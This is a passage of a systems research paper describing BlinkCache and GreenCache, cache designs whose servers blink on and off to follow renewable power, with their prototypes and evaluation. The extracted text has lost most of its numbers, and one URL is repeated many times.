unpopular video. to account for discrepancies in the popularity of different segments of a video, greencache divides a video into multiple chunks, where each chunk’s playtime is equal in length to the blink interval. similar to entire videos, greencache tracks chunk-level popularity as an exponentially weighted moving average of a chunk’s accesses. formally, we can express the popularity of the ith chunk after the tth interval as: popularityi t = αai t + ( − α)popularityi t− . ( ) ai t represents the total number of accesses of the ith chunk in the tth interval, and α is a configurable parameter that weights the impact of past accesses. further, greencache sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. manages videos at the chunk level, and evicts least popular chunks, from potentially different videos, to store a new chunk. as a result, greencache does not need to request chunks from the backend origin servers if the chunk is cached at one or more cache servers. reducing buffering time as discussed earlier, blinking increases buffering time up to a blink interval, if the requested chunk is not present on an active server. the proxy could mask the buffering time from a client if the client receives a chunk before it has finished playing the previous chunk. assuming sufficient energy and bandwidth, the proxy can get a cached chunk from a cache server within a blink interval, since all servers become active for a period during each blink interval. as a result, a user will not experience pauses or buffering while watching a video in sequence, since the proxy has enough time to send subsequent chunks (after the first chunk) either from the cache or the origin server before the previous chunk finishes playing, e.g., within a blink interval. however, the initial buffering time for the first chunk could be as long as an entire blink interval, since a request could arrive just after the cache server storing the first chunk becomes inactive. thus, to reduce the initial buffering time for a video, the proxy replicates the first chunk of cached videos on all cache servers. however, replication alone does not reduce the buffering time if all servers blink synchronously, i.e., become active at the same time every blink interval. as a result, as discussed next, greencache employs a staggered load-proportional blinking policy to maximize the probability of at least one cache server being active at any power level. staggered load-proportional blinking as discussed above, we replicate the first chunk of each cached video on all cache servers in order to reduce initial buffering time. to minimize the overlap in node active intervals and maximize the probability of at least one active node at all power levels, greencache staggers start times of all nodes across each blink interval. thus, every blink interval, e.g., s, each server is active for a different period of time, as well as a different duration (discussed below). at any instant, a different set of servers (and their cached data) is available for clients. since at low power the proxy might not be able to buffer all subsequent chunks from blinking nodes, clients might face delays or buffering while watching videos (after initially starting them). to reduce the intermediate buffering for popular videos, greencache also groups popular chunks together and assigns more power to nodes storing popular chunks than nodes storing unpopular chunks. thus, nodes storing popular chunks are active for a longer duration each blink interval. greencache ranks all servers from ...n , with being the most popular and n being the least popular node. the proxy monitors chunk popularity and migrates chunks to servers in rank order. furthermore, the proxy distributes the available power to nodes in proportion to the aggregate popularity of their chunks. formally, active period for the ith node, assuming negligible power for inactive state, could be expressed as activei = bi ∗ p ∗ popularityi mp ∗ n k= popularityi . ( ) sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure staggered load-proportional blinking. bi represents the length of a blink interval, popularityi represents the aggregate popularity of all chunks mapped on the ith node, p denotes the available power, and mp is the maximum power required by an active node. additionally, start times of nodes are staggered in a way that minimizes the unavailability of first chunks, i.e., minimizes the period when none of the nodes are active, every blink interval. figure depicts an example of staggered load-proportional blinking for five nodes. note that since the staggered load-proportional policy assigns active intervals in proportion to servers’ popularity, it does not create an unbalanced load on the cache servers. prefetching recommended videos most popular video sites display a recommended list of videos to users. for instance, youtube recommends a list of twenty videos which generally depends on the current video being watched, the user’s location, and other factors including past viewing history. the trace analysis of youtube videos, as discussed above, indicates that users tend to select the next video from recommended videos ∼ % of the time. in addition, a user selects a video at the top more often than a video further down in the recommended list. in fact, fig. a shows that nearly % of the time a user selects the next video from top five videos in the recommended list. to further reduce initial buffering time the proxy prefetches the first chunk of top five videos in the recommended list, if these chunks are not already present in the cache. the proxy fetches subsequent chunks of the video when the user requests the video next. implementation we use the blink’s hardware and software prototype from ‘blink prototype’ to experiment with blinkcache and greencache. we use the low-power server cluster of xo mother- boards for blinkcache, and that of mac minis for greencache. blinkcache implementation we run an unmodified memcached server and an instance of blink’s power client on each blinkcache node. we also wrote a memcached client workload generator to issue sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. key requests at a configurable but steady rate according to either a zipf popularity distribution, parameterized by α, or a uniform popularity distribution. as in a typical application, the workload generator fetches any data not resident in the cache from a mysql database and places it in the cache. since we assume the mysql server provides always-available persistent storage, it runs off the power grid and not variable power. we modify magent, a publicly available memcached proxy (http://code.google.com/ p/memagent/), to implement the design alternatives in the previous section, including table-based key mapping and popularity-based key migration. our modifications are not complex: we added or changed only lines of code to implement all of the blinkcache design variants from ‘blink prototype.’ since all requests pass through the proxy, it is able to monitor key popularity. the proxy controls blinking by interacting with blink’s power manager, which in our setup runs on the same node, to monitor the available power and battery level and set per-node blinking patterns. we also use the proxy for experiments with memcached’s default hash-based key mappings, rather than modifying the memcached client. since our always-on proxy is also subject to intermittent power constraints, we run it on a low-power ( w) embedded sheevaplug with a . ghz arm cpu and mb of memory. greencache implementation as discussed in ‘greencache: blinking multimedia cache,’ we study the greencache’s design in the context of a cellular tower powered by solar and wind energy. in our prototype we use a wimax base station to emulate the cellular tower. to analyze the blinking performance of greencache, we implement a greencache prototype in java, including a proxy (∼ , loc), cache server (∼ loc), power manager (∼ loc), and power client (∼ loc). mobile clients connect to the internet through a wireless base station, such as a cell tower or wimax base station, which is configured to route all multimedia requests to the proxy. while the power manager and proxy are functionally separate and communicate via well-defined apis, our prototype run both modules on the same node. our prototype does not require any modification in the base station or mobile clients. both cache server and power client run together on each blinking node. our prototype includes a full implementation of greencache, including the staggered load-proportional blinking policy, load-proportional chunk layout, prefetching, video chunking, chunk eviction and chunk migration. the proxy uses a java hashtable to map videos to chunks and their locations, e.g., via their ip address, and maintains their status, e.g., present or evicted. since our prototype has a modular implementation, we are able to experiment with other blinking policies and chunk layouts. we implement the activation and proportional policies similar to the memcached application as described in ‘blinkcache: blinking memcached’ and compare with greencache’s staggered load- proportional policy. we also implement a randomized chunk layout and the least recently used (lru) cache eviction policy to compare with the proposed load-proportional layout and popularity based eviction policy, respectively. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://dx.doi.org/ . /peerj-cs. as discussed in ‘blink prototype,’ we use a cluster of ten mac minis for greencache. we use one mac mini to run the proxy and power manager, whereas we run a cache server and power client on other mac minis. the proxy connects to a wimax base station (nec rel. . ebs) through the switch. we use a linux laptop with a teletonika usb wimax modem to run as a client. we also use a separate server to emulate multiple wimax clients. our emulator limits the wireless bandwidth, in the same way as observed by the wimax card, and plays the youtube trace described below. the wimax base station is operational and located on the roof of a tall building on the umass campus. however, the station is currently dedicated for research purposes and is not open to the general public. since greencache requires one node, running the proxy and power manager, the switch, and wimax base station to be active all the time, its minimum power consumption is w, or % of its maximum power consumption. to experiment with a wide range of video traffic, we wrote a mobile client emulator in java, which replays youtube traces. for each video request in the trace file, the emulator creates a new thread at the specified time to play the video as per the specified duration. in addition, the emulator also generates synthetic video requests based on various configurable settings, such as available bandwidth, popularity distribution of videos, e.g., a zipf parameter, viewing length distribution, and recommended list distribution. blink emulator to study how the blinkcache and greencache design scales with the cluster size we write an emulator that emulates a server cluster. the emulator takes the number of servers, servers’ parameters (e.g., ram, ip address, port), network bandwidth, and the application name as input parameters, and starts as many processes as the number of servers. each process emulates a node in the cluster, and applications running on that node are started in separate threads in the process. for example, a blinking node in blinkcache is emulated by a process with two threads—one thread runs a power client while the other runs a memcached server. the power manager takes the power trace from our field deployment and scales up the trace to bring the average power at % of the power necessary to run all nodes concurrently. to emulate blinking of a node the power client sends the process to the sleep state and active state as directed by the power manager. we run our blink emulator on a mac mini running linux kernel . . with . ghz intel core duo processor and gb of ram. the emulator starts up to , processes to emulate , blinking nodes. we use benchmark results from our low-power server cluster to set application-level configuration parameters, such as request rate, access latency, transition latency, power consumption, zipf parameter, servers to proxy ratio etc., for applications running on the blink emulator. as in our real cluster all modules and applications communicate over tcp/ip. further, to run a memcached server in a thread, rather than in a process, we write a small memcached emulator that emulates basic operations (single-key get and put) of memcached with similar latencies as observed with a real memcached server in our evaluation (‘evaluation’). sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. power signal we program our power supplies to replay solar and wind traces from our field deployment of solar panels and wind turbines. we also experiment with both multiple steady and oscillating power levels as a percentage, where % oscillation holds power steady throughout the experiment and n % oscillation varies power between ( + . n )% and ( − . n )% every five minutes. we combine traces from our solar/wind deployment, and set a minimum power level equal to the power necessary to operate the always-active components. we compress our renewable power signal to execute three days in three hours, and scale the average power to % of the cluster’s maximum power. evaluation we evaluate blinkcache and greencache on our small-scale blink prototype from ‘blink prototype’. the purpose of our evaluation is not to maximize the performance of a particular deployment of our applications—memcached and multimedia cache—or improve on the performance of the custom deployments common in industry. instead, our goal is to explore the effects of churn on the applications caused by power fluctuations for different design alternatives. our results will differ across platforms according to the specific blink interval, cpu speed, and network latency and bandwidth of the servers and the network. since our prototype uses low-power cpus and motherboards, the request latencies we observe in our prototype are not representative of those found in high performance servers. blinkcache evaluation we first use our workload generator to benchmark the performance of each blinking policy for both zipf-like and uniform popularity distributions at multiple power levels with varying levels of oscillation. we then demonstrate the performance for an example web application—tag clouds in glassfish—using realistic traces from our energy harvesting deployment that have varying power and oscillation levels. unless otherwise noted, in our experiments, we use moderate-size objects of kb, facebook-like zipf α values of . , and memcached’s consistent hashing mapping function. each experiment represents a half-hour trace, we configure each memcached server with a mb cache to provide an aggregate cache size of gb, and we use our programmable power supply to drive each power trace. since each node has only mb of memory, we scale our workloads appropriately for evaluation. benchmarks we measure the maximum power of each node, at % cpu and network utilization, in s to be . w and its minimum power in s to be . w. we use these values in the proxy to compute the length of active and inactive periods to cap power consumption at a specific level. we also measure the impact of our node’s near s transition latency for blink intervals t between s and min. figure shows the results for a duty cycle of %. in this case, the blinking interval must be over s before average power over the interval falls below % of the node’s maximum power, as we expect. the result shows that on-demand sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the near s latency to transition into and out of s in our prototype discourages blinking intervals shorter than roughly s. with a % duty cycle we expect to operate at % full power, but with a blink interval of less than s we operate near % full power. transitions that occur whenever work arrives or departs are not practical in our prototype. further, even blinking intervals as high as s impose significant power inefficiencies. as a result, we use a blinking interval of s for our experiments. our s blink interval is due solely to limitations in the blink prototype. note that there is an opportunity to significantly reduce blink intervals through both hardware and software optimizations. since server clusters do not typically leverage acpi’s s state, there has been little incentive to optimize its transition latency. next, we determine a baseline workload intensity for memcached, since, for certain request rates and key sizes, the proxy or the switch becomes a bottleneck. in our experiments, we use a steady request rate ( , get requests/s) that is less than the maximum request rate possible once the proxy or switch becomes a bottleneck. note that our results, which focus on hit rates, are a function of the popularity of objects rather than the distribution of request inter-arrival times. our goal is to evaluate how blinking affects the relative hit rates between the policies, and not the performance limitations of our particular set of low-power components. figure demonstrates the maximum performance, in terms of total throughput and request latency for different key values sizes, of an unmodified memcached server, our memcached proxy, and a mysql server. as expected, the memcached server provides an order of magnitude higher throughput and lower request latency than mysql. further, our proxy implementation imposes only a modest overhead to both throughput and latency, although the latency impact of proxy-based redirections will be greater on faster cpus since less relative request time is spent in the os and network. our subsequent experiments focus on request hit rates rather than request latencies, since latencies vary significantly across platforms and workloads. further, the wide disparity in latency between serving a request from memory and serving it from disk would show a larger, and potentially unfair, advantage for a blinking sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure maximum throughput (a) and latency (b) for a dedicated memcached server, our mem- cached proxy, and a mysql server. our proxy imposes only a modest overhead compared with a dedicated memcached server. (a) throughput. (b) latency. system. thus, we consider hit rate a better metric than latency for evaluating a blinking memcached instance. activation blinking and thrashing an activation policy for an unmodified version of memcached must choose whether or not to alter the hash-based mapping function as it activates and deactivates servers. for constant power, a dynamic mapping function that always reflects the currently active set of servers should provides the best hit rate, regardless of the popularity distribution, since applications will be able to insert the most popular keys on one of the active servers. figure a demonstrates this point for a workload with a zipf popularity distribution (α = . ), and shows the hit rates for both static and dynamic activation variants at multiple constant power levels. while at high power levels the approaches have similar hit rates, as power level decreases, we see that the static variant incurs a higher penalty under constant power. however, fig. b demonstrates that the opposite is true for highly variable power. the figure reports hit rates for different levels of power oscillation, where the average power for each experiment is % of the power necessary to run all nodes concurrently. the x-axis indicates oscillation level as a percentage, such that % oscillation holds power steady throughout the experiment and n % oscillation varies power between ( + . n)% and ( − . n)% every min. we see that dynamic changes in the active server set of memcached’s hash-based mapping function incur an invalidation penalty. since the invalidation penalty does not occur when memcached does not change the mapping function, the static variant provides a significantly better hit rate as the oscillations increase. although not shown here, the difference with the original modulo approach is much greater, since each change flushes nearly the entire cache. the hash-based mapping function forces a choice between performing well under constant power or performing well under variable power. a table-based approach that uses our proxy to explicitly map keys to servers and uses key migration to increase the priority of popular keys performs better in both scenarios. that is, the approach does not incur invalidation penalties under continuously variable power, or result in low hit rates under constant power, as also shown in figs. a and b. note sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure hit rate with activation policy under constant and oscillating power for a zipf popularity distribution. (a) constant power. (b) variable power. figure comparison of fairness and hit rate with synchronous policy and activation policy for a uniform popularity distribution. (a) standard deviation with constant power. (b) hit rate with constant power. that oscillation has no impact on other policies, e.g., those using key migration or the synchronous policy. synchronous blinking and fairness while the activation policy with key migration results in the highest hit rate overall, it is unfair when many servers store equally popular objects since the policy must choose some subset of equally popular servers to deactivate. figure a quantifies the fairness of the dynamic activation policy, the activation policy with key migration, and the synchronous policy, as a function of standard deviation in average per-object latency, at multiple constant power levels for a uniform popularity distribution where all objects are equally popular. note that for distributions where all objects are equally popular, key migration is not necessary and is equivalent to using the static variant of hash-based mapping. the synchronous policy is roughly x more fair than the activation policy with key migration at all power levels. while the dynamic hash-based mapping is nearly as fair as the synchronous policy, it has a worse hit rate, especially in high-power scenarios, as shown in fig. b. thus, the synchronous policy, which is more fair and provides lower average latency, is a better choice than any variant of the activation policy for uniform popularity sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of fairness and hit rate with load proportional policy, synchronous policy and activation policy for a zipf popularity distribution. (a) standard deviation with constant power. (b) hit rate with constant power. distributions. note that the key popularity distribution across servers in every memcached cluster that uses a hash-based mapping function is uniform, since keys map to servers randomly. thus, the synchronous policy is the best choice for a heavily-loaded memcached cluster that cannot tolerate the throughput penalty of using proxies. balancing performance and fairness activation with key migration results in the maximum hit rate for skewed popularity distributions where some objects are significantly more popular than others, while the synchronous policy results in the best overall performance, in terms of both hit rate and fairness, for uniform popularity distributions. the proportional policy combines the advantages of both and works well for zipf-like distributions with a few popular objects but a long tail of similarly (un)popular objects, since the long heavy tail in isolation is similar to the uniform distribution. figure b shows the hit rate for the proportional policy, the activation policy with migration, and the synchronous policy for a zipf popularity distribution with α = . at different power levels. the synchronous policy performs poorly, especially at low power levels, in this experiment, since it does not treat popular objects different than unpopular objects. however, the proportional policy attains nearly the same hit rate as the activation policy at high power levels, since it also prioritizes popular objects over unpopular objects. even at low power levels its hit rate is over % of the activation policy’s hit rate. further, the proportional policy is significantly more fair to the many unpopular objects in the distribution. figure a reports fairness, in terms of the standard deviation in per-object latency, at different power levels for the unpopular keys, i.e., keys ranked in the bottom th percentile of the distribution. the activation policy’s unfairness is nearly x worse at low power levels. thus, the proportional policy strikes a balance between performance and fairness when compared against both the synchronous and activation policies. finally, fig. shows how the s transition overhead affects our results at a moderate power level. the figure shows that the overhead has only a modest effect on the load-proportional policy’s hit rate. the overhead does not affect the relative fairness of the policies. note that all of our previous experiments use our prototype’s s transition sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure as s transition overhead increases, the hit rate from the load-proportional policy de- creases relative to the activation policy with key migration for a zipf distribution at a moderate power level. overhead. a shorter transition overhead would improve our results, and even a longer transition would show some, albeit lesser, benefits. case study: tag clouds in glassfish while our prior experiments compare our blinking policies for different power and oscillation levels, we also conduct an application case study using traces from our energy harvesting deployment. the experiment provides a glimpse of the performance tradeoffs for realistic power signals. glassfish is an open source java application server from sun, which includes a simple example application that reuses parts of the java petstore multi-tier web application, used in prior research, e.g., cohen et al. ( ), to create tag clouds for pets. tag clouds are a set of weighted tags that visually represent the most popular words on a web page. we modify the default web application to generate html for per-user tag cloud pages and cache them in memcached. the data to construct each html page comes from a series of sequential requests to a mysql database. for these experiments, we measure the latency to load user tag cloud pages, which incorporates mysql and html regeneration latencies whenever html pages are not resident in the cache. the mysql latency for our simple table-based data is typically ms per database query. while page load latency follows the same trend as hit rate, it provides a better application-level view of the impact of different policies. figure b shows the average latency to load user web pages across , users for our three different policies—activation with key migration, proportional, and synchronous—for a combined solar and wind trace, assuming the popularity of each user’s tag cloud page follows a zipf distribution with α = . . we derive the power signal, shown in fig. a, by compressing a -day energy harvesting trace to h. as expected, the activation policy with key migration and the load-proportional policy exhibit comparable page load latencies at most points in the trace. for this trace, the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure power signal from a combined wind/solar deployment (a) and average page load latency for that power signal (b). (a) power. (b) page load latency. load-proportional policy is within % of the activation policy’s hit rate. the activation policy is slightly better at low energy levels, since it tends to strictly ensure that more popular content is always cached. also as expected, the synchronous policy tends to perform poorly across all power levels. also as expected, we measure the standard deviation of page load latencies for the load-proportional policy to be within % to the synchronous policy for the vast majority, i.e., bottom %, of the equally unpopular objects. blinkcache scalability to see how our blinkcache design performs for a large server cluster we use the blink em- ulator from ‘implementation’ to emulate a cluster of , nodes. we use the benchmark results from above to set the throughput, access latency, and power consumption of servers. as described above, each proxy can serve memcached servers and give a maximum throughput of , requests/s. so, assuming the same throughput per proxy we select proxies for our , node cluster which can give an aggregate maximum throughput of , requests/s. we use the same memcached client and request trace that we used for the evaluation of our real cluster. as the number of proxies depend on the total number of active servers the activation policy activates/deactivates a number of proxies as it varies the number of active servers. to avoid migration of the key→server mappings from an inactive proxy to active ones we store all key→server mappings on each proxy. as each mapping requires only bytes the overhead of storing all is minimal. a memcached client uses a simple mapping function—hash(key)%numberproxies—to map a key to one of the proxies. if the number of active proxies changes a key previously mapped to a proxy might now map to a different proxy, which might not have the correct key→server mapping for that key. so, to reduce the overhead we sync the hash table (key→server mappings) of active proxies whenever their count changes. first we evaluate the maximum throughput of the cluster at different power levels. as shown in fig. the maximum throughput increases linearly with the available power which dictates the maximum number of active nodes. next, we evaluate the performance of aforementioned blinking policies—activation with key migration, synchronous, sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure throughput of a , node cluster with each node having the maximum throughput of , req/s. load-proportional with key migration—at various steady and oscillating power levels. comparing fig. a with fig. b it becomes clear that the performance (or relative performance) of different blinking policies does not vary much (within ± %) with the cluster size. further, the load-proportional policy performs better than the activation policy at high power for a large cluster, in construct to a small cluster of nodes, as the key migration overhead dominates the performance gain due to keeping the popular keys on always-active servers for a large cluster at high power. but, like a small cluster, the performance gain dominates the migration overhead for the activation policy at low to medium power even for a large cluster. figure b shows the hit rate for these three blinking policies for different oscillation levels from the % of full power. as expected, the hit rate for the activation policy drops down when the oscillation level increases because the migration overhead increases with the oscillation level. but, for the synchronous and load-proportional policies the hit rate remains the same at all oscillation levels because they don’t incur any migration overhead. greencache evaluation we first benchmark greencache’s proxy and chunking overhead for our prototype. we then evaluate greencache’s performance for real-world youtube traces at multiple power levels with varying levels of oscillation. we then demonstrate the performance using realistic power traces from our energy harvesting deployment that have varying power and oscillation levels. we use two metrics to measure the performance: ( ) bandwidth usage between the cache and youtube servers and ( ) average buffering or pause time at the clients. bandwidth usage denotes the total data received from backend servers over a given time interval; it also represents bandwidth cost that mobile operators must pay to internet service providers. one primary objective of greencache is to reduce this bandwidth usage. another key objective of greencache is to improve user’s viewing sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of hit rate with load-proportional policy, synchronous policy and activation policy for a zipf popularity distribution. (a) steady power. (b) oscillating power. experiences. therefore, we consider average buffering time per video as our second metric to measure the performance. note that our implementation tries to optimize both metrics independent of each other. however, optimizing for bandwidth usage does not depend on the power level, but on the total cache size, while optimizing for buffering time depends on both the cache size and the power level. benchmarks to measure the proxy’s overhead, our client emulator creates a single thread and sends multiple video requests in succession. the breakdown of the latency overhead at each component for a sample mb video chunk of min play length, assuming a kbps bit rate, is ms at the proxy, ms at the cache server, ms in the network between the proxy and cache server, and ms in the network between the proxy and client. the result demonstrates that the proxy’s latency overhead is low. we also benchmark average buffering time for different blink intervals at various power levels. table shows the standard deviation, th percentile, and average buffering time for video requests, as the blink interval and power levels change. as expected, the buffering time increases with the blink interval at low to moderate power levels. we also benchmark the standard deviation, th percentile, and average buffering time for requests going to youtube servers, which are as ms, ms, and ms, respectively. to study the performance of our prototype cache for different cache sizes and power levels we take a h trace (from pm to pm on february th, ) from our day youtube trace. the trace contains a total of , requests, for , unique videos, over the h interval. our trace reports the url, video id, client ip address, and request time for each video. in addition, we pull the recommended list for each video in the trace from the youtube servers. based on the video id, its recommended list, client ip address, and the next requested video id, we calculate the viewing length for each video. we assume the average video length as min and the streaming rate as kbps. also, we fix the downlink bandwidth from backend youtube servers to the wimax station to mbps, and the storage capacity of each cache server as gb. further, we fix the blink interval as s. we use a weighing factor of . for the proposed popularity-aware eviction policy. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table standard deviation, th percentile, and average buffering time at different power levels and blink intervals. buffering time (s) power (%) ⇓ blink interval = s std dev . . . . th per . . . . . avg. . . . . . blink interval = s std dev . . . . . th per . . . . . avg. . . . . . blink interval = s std dev . . . . . th per . . . . . avg. . . . . . blink interval = s std dev . . . . . th per . . . . . avg. . . . . . first, we study the performance—bandwidth usage and buffering or pause time for clients—for different number of cache servers at full power for the real world h youtube trace, as well as a synthetic trace of , requests where each request is for a randomly chosen video from the aforementioned , unique videos. in addition, we choose least-recently-used (lru) cache eviction policy for this experiment; further, videos are not chunked. figure plots the total bandwidth usage and average buffering time for both random and real traces. we also plot the optimal performance for real traces assuming we know all requests in advance. the optimal policy always keeps most popular videos in the cache, and never evicts a popular video to store a less popular video (over a given interval). as expected, the total bandwidth usage and average buffering time over the h interval decreases as the size or number of servers increases. next, to study the benefits of video chunking we measure the performance of three different cache eviction policies—lru, popularity-aware, and optimal—for the h real trace at full power and cache servers. figure shows that the performance of greencache’s popularity-aware eviction policy is better (∼ %) than that of lru. further, video chunking improves (> %) the performance of all policies as it avoids storing unpopular chunks of popular videos. in all cases, lru performs worse than others, which motivates our use of a popularity-aware cache eviction policy and video chunking for all further experiments. staggered load-proportional blinking as discussed earlier, the total bandwidth usage over a fixed interval, as long as a request does not go to backend servers for an already cached video, does not depend on the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure both bandwidth usage and buffering time reduce with increasing cache size. (a) bandwidth usage. (b) buffering time. figure video chunking reduces both bandwidth usage and buffering time. (a) bandwidth usage. (b) buffering time. available power level or blinking and layout policies; it only depends on the cache size and eviction policies. however, buffering time and users’ experiences do depend on the available power, blinking and layout policies. in this section, we study the effects of the power level on the average buffering time, and various optimizations designed to reduce the buffering time. we use the same h real youtube trace, as discussed above, and cache servers for all further experiments. further, we use video chunking and the popularity-aware eviction policy for all experiments. to compare the proposed staggered load-proportional policy with the activa- tion and load-proportional policies, we also implement an activation policy and a load-proportional policy for greencache, and integrate them with greencache’s popularity-aware eviction policy, video chunking, and popularity-aware migration policy. the activation policy activates or deactivates servers as power varies, whereas the load-proportional policy distributes the power to servers in proportion to their popularity. similar to the load-proportional policy, the activation policy also migrates popular chunks to active servers while deactivating servers due to the drop in the power level. unlike the proposed staggered load-proportional policy, the load-proportional policy does not replicate video chunks because it does not benefit from replication as it activates all servers at the same time every blink interval. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure buffering time at various steady and oscillating power levels. (a) steady power. (b) oscillat- ing power. figure a shows the average buffering time at different steady power levels. as expected, the activation policy performs better than the load-proportional policy at low power levels since, unlike the load-proportional policy, the activation policy does not incur the blinking overhead, which becomes significant in comparison to the active interval at low power levels. however, at moderate to high steady power levels, the benefit of a larger cache size, albeit blinking, dominates the blinking overhead for real-world traces. furthermore, the buffering time decreases significantly if first chunks are replicated on all servers. even at low power levels, replication of initial chunks significantly reduces the buffering time, while still leveraging the benefits of a larger cache size. moreover, the performance of the staggered load-proportional policy remains almost the same at all power levels. as video popularity changes infrequently, migration overheads in our experiments are modest (∼ %). figure b compares the average buffering time for the above policies at different oscillating power levels. we oscillate available power every five minutes. since migration overhead of the staggered proportional policy is independent of power level, its perfor- mance remains almost the same at all oscillation levels. however, the activation policy incurs migration overhead whenever the number of active servers decreases. consequently, the activation policy performs poorly at high oscillation levels, as indicated in the figure. though replication of initial chunks reduces the buffering time at all power levels, it is primarily required at low power levels. next, we evaluate the benefits of prefetching initial chunks of related videos. as fig. indicates, prefetching initial chunks of the top five videos reduces the buffering time by % as compared to no prefetching. further, since prefetching more videos doesn’t improve the buffering time, we limit the cache to prefetching only first chunks of top few videos from the related list. we choose to prefetch top five videos only in order to strike a balance between the performance gain and prefetching overhead. case study to experiment with our wimax base station using a real wimax client, we use a linux desktop with intel atom cpu n processor and gb ram connected to teltonika usb wimax modem. we disable all network interfaces except the wimax interface. the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure buffering time decreases as the number of prefetched videos (first chunk only) from related lists increases. desktop connects to the wimax base station (nec rel. . ebs), which we configure to route all video requests from the desktop to the proxy. we replay the same h youtube trace on the wimax client, but we use real power traces from our solar/wind deployment, as described in the previous section, to power the greencache cluster. figure plots average buffering time, calculated every five minutes, for three blinking policies: activation, load proportional, and staggered load proportional with first chunks replicated. as expected, the performance of all three policies goes down (buffering time goes up) when the available power drops down, and vice versa. however, the performance of activation degrades more than that of load-proportional when the available power drops down, since the activation policy incurs migration overhead when the number of active servers decreases. further, replicating first chunks significantly reduces the buffering time for the staggered load-proportional policy at all power levels. since the migration overhead of the staggered load-proportional policy is independent of power levels, its performance does not vary much, not even when the available power changes significantly, if first chunks are replicated. greencache scalability next, we use the blink emulator to study how greencache performs on a cluster of , nodes for the youtube dataset and user request trace described above. we run all blink and greencache modules as described above, and use the benchmark results to set the throughput, access latency, and power consumption of servers. figures a and b show the average latency and bandwidth, respectively, at various power levels. as expected, both the average latency and bandwidth cost reduce with increasing power levels as the number of active nodes or the total cache size increases with the power level. figure a shows the buffering time for the aforementioned blinking policies at three different steady power levels. as expected, the staggered load-proportional policy performs best at all power levels due to the replication of first chunk of all videos. the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure buffering time at various power levels for our combined solar/wind power trace. figure latency and bandwidth cost on , node cluster for youtube video requests with steady available power. (a) average latency in video requests. (b) average bandwidth cost in video requests. load-proportional policy recalculates the popularity of chunks every , requests and migrates popular chunks to mostly active servers. comparing figs. a and a it is evident that the relative performance of different policies does not vary much with the cluster size. similarly, figs. b and b indicates that all three blinking policies give similar performance (or relative performance) for a small as well as a large cluster. related work the sensor network community has studied strategies for dealing with variable sources of renewable power, since these systems often do not have access to the power grid. however, since sensor networks are geographically distributed, each node must harvest its own energy, resulting in network-wide energy imbalances (fan, zheng & sinha, ), whereas sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure buffering time with activation policy, load proportional policy, and staggered load propor- tional policy. (a) steady power. oscillating power. data center nodes share a common power delivery infrastructure. further, the primary performance metric for a sensor network is the amount of data the network collects. as a result, much of the energy harvesting work is not directly applicable to data centers. similarly, mobile computing generally focuses on extending battery life by regulating power consumption (zeng et al., ), rather than modulating performance to match energy production. the increasing energy consumption of data centers (us environmental protection agency, ) has led companies to invest heavily in renewable energy sources (miller, ; stone, ). for example, the goal of google’s re < c initiative is to make large-scale renewable power generation cheaper than coal-based production. as a result, researchers have started to study how to incorporate renewables into a data center’s power delivery infrastructure (stewart & shen, ). as one example, lee et al. ( ) use request redirection to control the carbon footprint of data centers by redirecting load to servers powered by renewable energy sources. while not directly related to energy harvesting, power routing (pelley et al., ) proposes shuffled power delivery topologies that allow data centers to control how much power each rack receives. while the topologies are well-suited for delivering variable amounts of power to racks based on 